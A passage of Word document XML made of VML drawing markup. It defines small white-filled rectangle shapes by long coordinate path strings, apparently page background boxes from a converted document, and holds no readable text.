3,3143,8713,3143,8713,3142,8713,3142,8713,3142,8713,3141,8713,3141,8713,3141,8713,3140,8713,3140,8713,3140,8713,3139,8713,3139,8713,3138,8713,3138,8713,3137,8713,3137,8713,3136,8713,3136,8713,3135,8713,3134,8713,3134,8713,3133,8713,3132,8713,3132,8713,3131,8713,3130,8713,3129,8713,3129,8713,3128,8713,3127,8713,3126,8713,3125,8713,3124,8713,3123,8713,3122,8713,3121,8713,3120,8713,3119,8713,3118,8713,3117,8713,3116,8713,3114,8713,3113,8713,3112,8713,3110,8713,3109,8713,3108,8713,3106,8713,3105,8713,3103,8713,3102,8713,3100,8713,3099,8713,3097,8713,3095,8713,3094,8713,3092,8713,3090,8713,3088,8713,3086,8713,3084,8713,3083,8713,3081,8713,3079,8713,3076,8713,3074,8713,3072,8713,3070,8713,3068,8713,3065,8713,3063,8713,3061,8713,3058,8713,3056,8713,3053,8713,3051,8713,3048,8713,3045,8713,3043,8713,3040,8713,3037,8713,3034,8713,3031,8713,3029,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8713,3026,8712,3026,8712,3026,8712,3026,8712,3026,8712,3026,8711,3026,8711,3026,8711,3026,8710,3026,8710,3026,8710,3026,8709,3026,8709,3026,8708,3026,8708,3026,8707,3026,8707,3026,8706,3026,8706,3026,8705,3026,8704,3026,8704,3026,8703,3026,8702,3026,8701,3026,8700,3026,8700,3026,8699,3026,8698,3026,8697,3026,8696,3026,8694,3026,8693,3026,8692,3026,8691,3026,8690,3026,8688,3026,8687,3026,8685,3026,8684,3026,8682,3026,8681,3026,8679,3026,8677,3026,8676,3026,8674,3026,8672,3026,8670,3026,8668,3026,8666,3026,8664,3026,8661,3026,8659,3026,8657,3026,8654,3026,8652,3026,8650,3026,8647,3026,8644,3026,8642,3026,8639,3026,8636,3026,8633,3026,8630,3026,8627,3026,8624,3026,8620,3026,8617,3026,8614,3026,8610,3026,8607,3026,8603,3026,8599,3026,8595,3026,8592,3026,8588,3026,8584,3026,8579,3026,8575,3026,8571,3026,8566,3026,8562,3026,8557,3026,8553,3026,8548,3026,8543,3026,8538,3026,8533,3026,8528,3026,8523,3026,8517,3026,8512,3026,8506,3026,8501,3026,8495,3026,8489,3026,8483,3026,8477,3026,8471,3026,8465,3026,8458e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:216.500pt;margin-top:439.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4330,8790" coordsize="130,270">
        <v:shape style="position:absolute;left:4330;top:8790;width:130;height:270" coordorigin="4330,8790" coordsize="130,270" path="m4346,8818l4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4346,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4347,8818,4348,8818,4348,8818,4348,8818,4348,8818,4348,8818,4349,8818,4349,8818,4349,8818,4349,8818,4350,8818,4350,8818,4350,8818,4350,8818,4351,8818,4351,8818,4351,8818,4352,8818,4352,8818,4353,8818,4353,8818,4354,8818,4354,8818,4355,8818,4355,8818,4356,8818,4356,8818,4357,8818,4357,8818,4358,8818,4359,8818,4359,8818,4360,8818,4361,8818,4362,8818,4362,8818,4363,8818,4364,8818,4365,8818,4366,8818,4367,8818,4368,8818,4369,8818,4370,8818,4371,8818,4372,8818,4373,8818,4374,8818,4375,8818,4376,8818,4377,8818,4379,8818,4380,8818,4381,8818,4383,8818,4384,8818,4385,8818,4387,8818,4388,8818,4390,8818,4392,8818,4393,8818,4395,8818,4396,8818,4398,8818,4400,8818,4402,8818,4403,8818,4405,8818,4407,8818,4409,8818,4411,8818,4413,8818,4415,8818,4417,8818,4420,8818,4422,8818,4424,8818,4426,8818,4429,8818,4431,8818,4433,8818,4436,8818,4438,8818,4441,8818,4444,8818,4446,8818,4449,8818,4452,8818,4455,8818,4457,8818,4460,8818,4463,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8818,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8819,4466,8820,4466,8820,4466,8820,4466,8820,4466,8821,4466,8821,4466,8821,4466,8821,4466,8822,4466,8822,4466,8823,4466,8823,4466,8823,4466,8824,4466,8824,4466,8825,4466,8826,4466,8826,4466,8827,4466,8827,4466,8828,4466,8829,4466,8830,4466,8830,4466,8831,4466,8832,4466,8833,4466,8834,4466,8835,4466,8836,4466,8837,4466,8839,4466,8840,4466,8841,4466,8842,4466,8844,4466,8845,4466,8846,4466,8848,4466,8850,4466,8851,4466,8853,4466,8855,4466,8856,4466,8858,4466,8860,4466,8862,4466,8864,4466,8866,4466,8868,4466,8870,4466,8873,4466,8875,4466,8877,4466,8880,4466,8882,4466,8885,4466,8888,4466,8890,4466,8893,4466,8896,4466,8899,4466,8902,4466,8905,4466,8908,4466,8911,4466,8915,4466,8918,4466,8922,4466,8925,4466,8929,4466,8933,4466,8936,4466,8940,4466,8944,4466,8948,4466,8952,4466,8957,4466,8961,4466,8965,4466,8970,4466,8974,4466,8979,4466,8984,4466,8989,4466,8994,4466,8999,4466,9004,4466,9009,4466,9015,4466,9020,4466,9025,4466,9031,4466,9037,4466,9043,4466,9049,4466,9055,4466,9061,4466,9067,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4466,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4465,9074,4464,9074,4464,9074,4464,9074,4464,9074,4463,9074,4463,9074,4463,9074,4463,9074,4462,9074,4462,9074,4462,9074,4461,9074,4461,9074,4461,9074,4460,9074,4460,9074,4459,9074,4459,9074,4458,9074,4458,9074,4457,9074,4457,9074,4456,9074,4456,9074,4455,9074,4454,9074,4454,9074,4453,9074,4452,9074,4452,9074,4451,9074,4450,9074,4449,9074,4448,9074,4448,9074,4447,9074,4446,9074,4445,9074,4444,9074,4443,9074,4442,9074,4441,9074,4440,9074,4439,9074,4437,9074,4436,9074,4435,9074,4434,9074,4432,9074,4431,9074,4430,9074,4428,9074,4427,9074,4426,9074,4424,9074,4422,9074,4421,9074,4419,9074,4418,9074,4416,9074,4414,9074,4413,9074,4411,9074,4409,9074,4407,9074,4405,9074,4403,9074,4401,9074,4399,9074,4397,9074,4395,9074,4393,9074,4391,9074,4388,9074,4386,9074,4384,9074,4381,9074,4379,9074,4377,9074,4374,9074,4371,9074,4369,9074,4366,9074,4363,9074,4361,9074,4358,9074,4355,9074,4352,9074,4349,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9074,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9073,4346,9072,4346,9072,4346,9072,4346,9072,4346,9071,4346,9071,4346,9071,4346,9071,4346,9070,4346,9070,4346,9069,4346,9069,4346,9069,4346,9068,4346,9068,4346,9067,4346,9067,4346,9066,4346,9065,4346,9065,4346,9064,4346,9063,4346,9062,4346,9062,4346,9061,4346,9060,4346,9059,4346,9058,4346,9057,4346,9056,4346,9055,4346,9053,4346,9052,4346,9051,4346,9050,4346,9048,4346,9047,4346,9046,4346,9044,4346,9042,4346,9041,4346,9039,4346,9037,4346,9036,4346,9034,4346,9032,4346,9030,4346,9028,4346,9026,4346,9024,4346,9022,4346,9019,4346,9017,4346,9015,4346,9012,4346,9010,4346,9007,4346,9004,4346,9002,4346,8999,4346,8996,4346,8993,4346,8990,4346,8987,4346,8984,4346,8981,4346,8977,4346,8974,4346,8970,4346,8967,4346,8963,4346,8959,4346,8956,4346,8952,4346,8948,4346,8944,4346,8940,4346,8935,4346,8931,4346,8927,4346,8922,4346,8918,4346,8913,4346,8908,4346,8903,4346,8898,4346,8893,4346,8888,4346,8883,4346,8878,4346,8872,4346,8867,4346,8861,4346,8855,4346,8849,4346,8843,4346,8837,4346,8831,4346,8825,4346,8818e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.500pt;margin-top:439.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4810,8790" coordsize="130,270">
        <v:shape style="position:absolute;left:4810;top:8790;width:130;height:270" coordorigin="4810,8790" coordsize="130,270" path="m4826,8818l4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4826,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4827,8818,4828,8818,4828,8818,4828,8818,4828,8818,4828,8818,4828,8818,4829,8818,4829,8818,4829,8818,4829,8818,4829,8818,4830,8818,4830,8818,4830,8818,4831,8818,4831,8818,4831,8818,4832,8818,4832,8818,4833,8818,4833,8818,4833,8818,4834,8818,4834,8818,4835,8818,4835,8818,4836,8818,4836,8818,4837,8818,4838,8818,4838,8818,4839,8818,4840,8818,4840,8818,4841,8818,4842,8818,4843,8818,4843,8818,4844,8818,4845,8818,4846,8818,4847,8818,4848,8818,4849,8818,4850,8818,4851,8818,4852,8818,4853,8818,4854,8818,4855,8818,4856,8818,4858,8818,4859,8818,4860,8818,4862,8818,4863,8818,4864,8818,4866,8818,4867,8818,4869,8818,4870,8818,4872,8818,4873,8818,4875,8818,4877,8818,4878,8818,4880,8818,4882,8818,4884,8818,4886,8818,4888,8818,4889,8818,4891,8818,4893,8818,4896,8818,4898,8818,4900,8818,4902,8818,4904,8818,4907,8818,4909,8818,4911,8818,4914,8818,4916,8818,4919,8818,4921,8818,4924,8818,4927,8818,4929,8818,4932,8818,4935,8818,4938,8818,4941,8818,4943,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8818,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8819,4946,8820,4946,8820,4946,8820,4946,8820,4946,8821,4946,8821,4946,8821,4946,8821,4946,8822,4946,8822,4946,8823,4946,8823,4946,8823,4946,8824,4946,8824,4946,8825,4946,8826,4946,8826,4946,8827,4946,8827,4946,8828,4946,8829,4946,8830,4946,8830,4946,8831,4946,8832,4946,8833,4946,8834,4946,8835,4946,8836,4946,8837,4946,8839,4946,8840,4946,8841,4946,8842,4946,8844,4946,8845,4946,8846,4946,8848,4946,8850,4946,8851,4946,8853,4946,8855,4946,8856,4946,8858,4946,8860,4946,8862,4946,8864,4946,8866,4946,8868,4946,8870,4946,8873,4946,8875,4946,8877,4946,8880,4946,8882,4946,8885,4946,8888,4946,8890,4946,8893,4946,8896,4946,8899,4946,8902,4946,8905,4946,8908,4946,8911,4946,8915,4946,8918,4946,8922,4946,8925,4946,8929,4946,8933,4946,8936,4946,8940,4946,8944,4946,8948,4946,8952,4946,8957,4946,8961,4946,8965,4946,8970,4946,8974,4946,8979,4946,8984,4946,8989,4946,8994,4946,8999,4946,9004,4946,9009,4946,9015,4946,9020,4946,9025,4946,9031,4946,9037,4946,9043,4946,9049,4946,9055,4946,9061,4946,9067,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4946,9074,4945,9074,4945,9074,4945,9074,4945,9074,4945,9074,4945,9074,4944,9074,4944,9074,4944,9074,4944,9074,4943,9074,4943,9074,4943,9074,4943,9074,4942,9074,4942,9074,4942,9074,4941,9074,4941,9074,4940,9074,4940,9074,4940,9074,4939,9074,4939,9074,4938,9074,4938,9074,4937,9074,4936,9074,4936,9074,4935,9074,4935,9074,4934,9074,4933,9074,4933,9074,4932,9074,4931,9074,4930,9074,4930,9074,4929,9074,4928,9074,4927,9074,4926,9074,4925,9074,4924,9074,4923,9074,4922,9074,4921,9074,4920,9074,4919,9074,4918,9074,4916,9074,4915,9074,4914,9074,4913,9074,4911,9074,4910,9074,4909,9074,4907,9074,4906,9074,4904,9074,4903,9074,4901,9074,4900,9074,4898,9074,4896,9074,4895,9074,4893,9074,4891,9074,4889,9074,4887,9074,4885,9074,4883,9074,4881,9074,4879,9074,4877,9074,4875,9074,4873,9074,4871,9074,4869,9074,4866,9074,4864,9074,4862,9074,4859,9074,4857,9074,4854,9074,4852,9074,4849,9074,4846,9074,4844,9074,4841,9074,4838,9074,4835,9074,4832,9074,4829,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9074,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9073,4826,9072,4826,9072,4826,9072,4826,9072,4826,9071,4826,9071,4826,9071,4826,9071,4826,9070,4826,9070,4826,9069,4826,9069,4826,9069,4826,9068,4826,9068,4826,9067,4826,9067,4826,9066,4826,9065,4826,9065,4826,9064,4826,9063,4826,9062,4826,9062,4826,9061,4826,9060,4826,9059,4826,9058,4826,9057,4826,9056,4826,9055,4826,9053,4826,9052,4826,9051,4826,9050,4826,9048,4826,9047,4826,9046,4826,9044,4826,9042,4826,9041,4826,9039,4826,9037,4826,9036,4826,9034,4826,9032,4826,9030,4826,9028,4826,9026,4826,9024,4826,9022,4826,9019,4826,9017,4826,9015,4826,9012,4826,9010,4826,9007,4826,9004,4826,9002,4826,8999,4826,8996,4826,8993,4826,8990,4826,8987,4826,8984,4826,8981,4826,8977,4826,8974,4826,8970,4826,8967,4826,8963,4826,8959,4826,8956,4826,8952,4826,8948,4826,8944,4826,8940,4826,8935,4826,8931,4826,8927,4826,8922,4826,8918,4826,8913,4826,8908,4826,8903,4826,8898,4826,8893,4826,8888,4826,8883,4826,8878,4826,8872,4826,8867,4826,8861,4826,8855,4826,8849,4826,8843,4826,8837,4826,8831,4826,8825,4826,8818e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:294.500pt;margin-top:439.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5890,8790" coordsize="130,270">
        <v:shape style="position:absolute;left:5890;top:8790;width:130;height:270" coordorigin="5890,8790" coordsize="130,270" path="m5907,8818l5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5907,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5908,8818,5909,8818,5909,8818,5909,8818,5909,8818,5909,8818,5910,8818,5910,8818,5910,8818,5910,8818,5911,8818,5911,8818,5911,8818,5912,8818,5912,8818,5912,8818,5913,8818,5913,8818,5913,8818,5914,8818,5914,8818,5915,8818,5915,8818,5916,8818,5916,8818,5917,8818,5918,8818,5918,8818,5919,8818,5919,8818,5920,8818,5921,8818,5922,8818,5922,8818,5923,8818,5924,8818,5925,8818,5926,8818,5927,8818,5927,8818,5928,8818,5929,8818,5930,8818,5931,8818,5932,8818,5934,8818,5935,8818,5936,8818,5937,8818,5938,8818,5940,8818,5941,8818,5942,8818,5943,8818,5945,8818,5946,8818,5948,8818,5949,8818,5951,8818,5952,8818,5954,8818,5956,8818,5957,8818,5959,8818,5961,8818,5962,8818,5964,8818,5966,8818,5968,8818,5970,8818,5972,8818,5974,8818,5976,8818,5978,8818,5980,8818,5983,8818,5985,8818,5987,8818,5989,8818,5992,8818,5994,8818,5997,8818,5999,8818,6002,8818,6004,8818,6007,8818,6010,8818,6013,8818,6015,8818,6018,8818,6021,8818,6024,8818,6027,8818,6027,8818,6027,8818,6027,8818,6027,8818,6027,8818,6027,8818,6027,8818,6027,8818,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8819,6027,8820,6027,8820,6027,8820,6027,8820,6027,8821,6027,8821,6027,8821,6027,8821,6027,8822,6027,8822,6027,8823,6027,8823,6027,8823,6027,8824,6027,8824,6027,8825,6027,8826,6027,8826,6027,8827,6027,8827,6027,8828,6027,8829,6027,8830,6027,8830,6027,8831,6027,8832,6027,8833,6027,8834,6027,8835,6027,8836,6027,8837,6027,8839,6027,8840,6027,8841,6027,8842,6027,8844,6027,8845,6027,8846,6027,8848,6027,8850,6027,8851,6027,8853,6027,8855,6027,8856,6027,8858,6027,8860,6027,8862,6027,8864,6027,8866,6027,8868,6027,8870,6027,8873,6027,8875,6027,8877,6027,8880,6027,8882,6027,8885,6027,8888,6027,8890,6027,8893,6027,8896,6027,8899,6027,8902,6027,8905,6027,8908,6027,8911,6027,8915,6027,8918,6027,8922,6027,8925,6027,8929,6027,8933,6027,8936,6027,8940,6027,8944,6027,8948,6027,8952,6027,8957,6027,8961,6027,8965,6027,8970,6027,8974,6027,8979,6027,8984,6027,8989,6027,8994,6027,8999,6027,9004,6027,9009,6027,9015,6027,9020,6027,9025,6027,9031,6027,9037,6027,9043,6027,9049,6027,9055,6027,9061,6027,9067,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6027,9074,6026,9074,6026,9074,6026,9074,6026,9074,6026,9074,6026,9074,6026,9074,6026,9074,6025,9074,6025,9074,6025,9074,6025,9074,6025,9074,6024,9074,6024,9074,6024,9074,6024,9074,6023,9074,6023,9074,6023,9074,6022,9074,6022,9074,6022,9074,6021,9074,6021,9074,6021,9074,6020,9074,6020,9074,6019,9074,6019,9074,6018,9074,6018,9074,6017,9074,6016,9074,6016,9074,6015,9074,6015,9074,6014,9074,6013,9074,6012,9074,6012,9074,6011,9074,6010,9074,6009,9074,6008,9074,6007,9074,6007,9074,6006,9074,6005,9074,6004,9074,6003,9074,6002,9074,6000,9074,5999,9074,5998,9074,5997,9074,5996,9074,5995,9074,5993,9074,5992,9074,5991,9074,5989,9074,5988,9074,5986,9074,5985,9074,5983,9074,5982,9074,5980,9074,5978,9074,5977,9074,5975,9074,5973,9074,5972,9074,5970,9074,5968,9074,5966,9074,5964,9074,5962,9074,5960,9074,5958,9074,5956,9074,5954,9074,5951,9074,5949,9074,5947,9074,5945,9074,5942,9074,5940,9074,5937,9074,5935,9074,5932,9074,5930,9074,5927,9074,5924,9074,5921,9074,5919,9074,5916,9074,5913,9074,5910,9074,5907,9074,5907,9074,5907,9074,5907,9074,5907,9074,5907,9074,5907,9074,5907,9074,5907,9074,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9073,5907,9072,5907,9072,5907,9072,5907,9072,5907,9071,5907,9071,5907,9071,5907,9071,5907,9070,5907,9070,5907,9069,5907,9069,5907,9069,5907,9068,5907,9068,5907,9067,5907,9067,5907,9066,5907,9065,5907,9065,5907,9064,5907,9063,5907,9062,5907,9062,5907,9061,5907,9060,5907,9059,5907,9058,5907,9057,5907,9056,5907,9055,5907,9053,5907,9052,5907,9051,5907,9050,5907,9048,5907,9047,5907,9046,5907,9044,5907,9042,5907,9041,5907,9039,5907,9037,5907,9036,5907,9034,5907,9032,5907,9030,5907,9028,5907,9026,5907,9024,5907,9022,5907,9019,5907,9017,5907,9015,5907,9012,5907,9010,5907,9007,5907,9004,5907,9002,5907,8999,5907,8996,5907,8993,5907,8990,5907,8987,5907,8984,5907,8981,5907,8977,5907,8974,5907,8970,5907,8967,5907,8963,5907,8959,5907,8956,5907,8952,5907,8948,5907,8944,5907,8940,5907,8935,5907,8931,5907,8927,5907,8922,5907,8918,5907,8913,5907,8908,5907,8903,5907,8898,5907,8893,5907,8888,5907,8883,5907,8878,5907,8872,5907,8867,5907,8861,5907,8855,5907,8849,5907,8843,5907,8837,5907,8831,5907,8825,5907,8818e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:475.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,9510" coordsize="130,250">
        <v:shape style="position:absolute;left:2170;top:9510;width:130;height:250" coordorigin="2170,9510" coordsize="130,250" path="m2185,9524l2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2185,9524,2186,9524,2186,9524,2186,9524,2186,9524,2186,9524,2186,9524,2186,9524,2186,9524,2186,9524,2187,9524,2187,9524,2187,9524,2187,9524,2187,9524,2187,9524,2188,9524,2188,9524,2188,9524,2188,9524,2189,9524,2189,9524,2189,9524,2190,9524,2190,9524,2190,9524,2191,9524,2191,9524,2192,9524,2192,9524,2192,9524,2193,9524,2193,9524,2194,9524,2195,9524,2195,9524,2196,9524,2196,9524,2197,9524,2198,9524,2198,9524,2199,9524,2200,9524,2200,9524,2201,9524,2202,9524,2203,9524,2204,9524,2205,9524,2206,9524,2207,9524,2208,9524,2209,9524,2210,9524,2211,9524,2212,9524,2213,9524,2214,9524,2215,9524,2216,9524,2218,9524,2219,9524,2220,9524,2222,9524,2223,9524,2224,9524,2226,9524,2227,9524,2229,9524,2230,9524,2232,9524,2234,9524,2235,9524,2237,9524,2239,9524,2241,9524,2242,9524,2244,9524,2246,9524,2248,9524,2250,9524,2252,9524,2254,9524,2256,9524,2259,9524,2261,9524,2263,9524,2265,9524,2268,9524,2270,9524,2272,9524,2275,9524,2277,9524,2280,9524,2283,9524,2285,9524,2288,9524,2291,9524,2293,9524,2296,9524,2299,9524,2302,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9524,2305,9525,2305,9525,2305,9525,2305,9525,2305,9525,2305,9525,2305,9526,2305,9526,2305,9526,2305,9526,2305,9527,2305,9527,2305,9527,2305,9528,2305,9528,2305,9529,2305,9529,2305,9530,2305,9530,2305,9531,2305,9531,2305,9532,2305,9533,2305,9533,2305,9534,2305,9535,2305,9536,2305,9537,2305,9538,2305,9539,2305,9540,2305,9541,2305,9542,2305,9543,2305,9544,2305,9545,2305,9546,2305,9548,2305,9549,2305,9550,2305,9552,2305,9553,2305,9555,2305,9557,2305,9558,2305,9560,2305,9562,2305,9563,2305,9565,2305,9567,2305,9569,2305,9571,2305,9574,2305,9576,2305,9578,2305,9580,2305,9583,2305,9585,2305,9588,2305,9590,2305,9593,2305,9596,2305,9598,2305,9601,2305,9604,2305,9607,2305,9610,2305,9614,2305,9617,2305,9620,2305,9623,2305,9627,2305,9631,2305,9634,2305,9638,2305,9642,2305,9646,2305,9650,2305,9654,2305,9658,2305,9662,2305,9666,2305,9671,2305,9675,2305,9680,2305,9684,2305,9689,2305,9694,2305,9699,2305,9704,2305,9709,2305,9715,2305,9720,2305,9725,2305,9731,2305,9737,2305,9742,2305,9748,2305,9754,2305,9760,2305,9766,2305,9773,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2305,9779,2304,9779,2304,9779,2304,9779,2304,9779,2304,9779,2304,9779,2304,9779,2303,9779,2303,9779,2303,9779,2303,9779,2303,9779,2302,9779,2302,9779,2302,9779,2302,9779,2301,9779,2301,9779,2301,9779,2300,9779,2300,9779,2299,9779,2299,9779,2299,9779,2298,9779,2298,9779,2297,9779,2297,9779,2296,9779,2296,9779,2295,9779,2295,9779,2294,9779,2293,9779,2293,9779,2292,9779,2291,9779,2291,9779,2290,9779,2289,9779,2288,9779,2287,9779,2286,9779,2286,9779,2285,9779,2284,9779,2283,9779,2282,9779,2281,9779,2280,9779,2279,9779,2277,9779,2276,9779,2275,9779,2274,9779,2273,9779,2271,9779,2270,9779,2269,9779,2267,9779,2266,9779,2264,9779,2263,9779,2261,9779,2260,9779,2258,9779,2257,9779,2255,9779,2253,9779,2251,9779,2250,9779,2248,9779,2246,9779,2244,9779,2242,9779,2240,9779,2238,9779,2236,9779,2234,9779,2232,9779,2230,9779,2227,9779,2225,9779,2223,9779,2220,9779,2218,9779,2215,9779,2213,9779,2210,9779,2208,9779,2205,9779,2202,9779,2200,9779,2197,9779,2194,9779,2191,9779,2188,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9779,2185,9778,2185,9778,2185,9778,2185,9778,2185,9778,2185,9778,2185,9778,2185,9777,2185,9777,2185,9777,2185,9777,2185,9776,2185,9776,2185,9776,2185,9775,2185,9775,2185,9774,2185,9774,2185,9773,2185,9773,2185,9772,2185,9772,2185,9771,2185,9771,2185,9770,2185,9769,2185,9768,2185,9768,2185,9767,2185,9766,2185,9765,2185,9764,2185,9763,2185,9762,2185,9761,2185,9760,2185,9759,2185,9758,2185,9756,2185,9755,2185,9754,2185,9752,2185,9751,2185,9749,2185,9748,2185,9746,2185,9745,2185,9743,2185,9741,2185,9739,2185,9737,2185,9735,2185,9733,2185,9731,2185,9729,2185,9727,2185,9725,2185,9722,2185,9720,2185,9718,2185,9715,2185,9712,2185,9710,2185,9707,2185,9704,2185,9701,2185,9698,2185,9695,2185,9692,2185,9689,2185,9686,2185,9683,2185,9679,2185,9676,2185,9672,2185,9669,2185,9665,2185,9661,2185,9657,2185,9653,2185,9649,2185,9645,2185,9641,2185,9636,2185,9632,2185,9628,2185,9623,2185,9618,2185,9613,2185,9609,2185,9604,2185,9599,2185,9593,2185,9588,2185,9583,2185,9577,2185,9572,2185,9566,2185,9560,2185,9555,2185,9549,2185,9543,2185,9536,2185,9530,2185,9524e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:493.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,9870" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:9870;width:130;height:270" coordorigin="2170,9870" coordsize="130,270" path="m2185,9899l2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2185,9899,2186,9899,2186,9899,2186,9899,2186,9899,2186,9899,2186,9899,2186,9899,2186,9899,2186,9899,2187,9899,2187,9899,2187,9899,2187,9899,2187,9899,2187,9899,2188,9899,2188,9899,2188,9899,2188,9899,2189,9899,2189,9899,2189,9899,2190,9899,2190,9899,2190,9899,2191,9899,2191,9899,2192,9899,2192,9899,2192,9899,2193,9899,2193,9899,2194,9899,2195,9899,2195,9899,2196,9899,2196,9899,2197,9899,2198,9899,2198,9899,2199,9899,2200,9899,2200,9899,2201,9899,2202,9899,2203,9899,2204,9899,2205,9899,2206,9899,2207,9899,2208,9899,2209,9899,2210,9899,2211,9899,2212,9899,2213,9899,2214,9899,2215,9899,2216,9899,2218,9899,2219,9899,2220,9899,2222,9899,2223,9899,2224,9899,2226,9899,2227,9899,2229,9899,2230,9899,2232,9899,2234,9899,2235,9899,2237,9899,2239,9899,2241,9899,2242,9899,2244,9899,2246,9899,2248,9899,2250,9899,2252,9899,2254,9899,2256,9899,2259,9899,2261,9899,2263,9899,2265,9899,2268,9899,2270,9899,2272,9899,2275,9899,2277,9899,2280,9899,2283,9899,2285,9899,2288,9899,2291,9899,2293,9899,2296,9899,2299,9899,2302,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9899,2305,9900,2305,9900,2305,9900,2305,9900,2305,9900,2305,9900,2305,9901,2305,9901,2305,9901,2305,9901,2305,9902,2305,9902,2305,9902,2305,9903,2305,9903,2305,9903,2305,9904,2305,9904,2305,9905,2305,9905,2305,9906,2305,9907,2305,9907,2305,9908,2305,9909,2305,9909,2305,9910,2305,9911,2305,9912,2305,9913,2305,9914,2305,9915,2305,9916,2305,9917,2305,9918,2305,9919,2305,9920,2305,9922,2305,9923,2305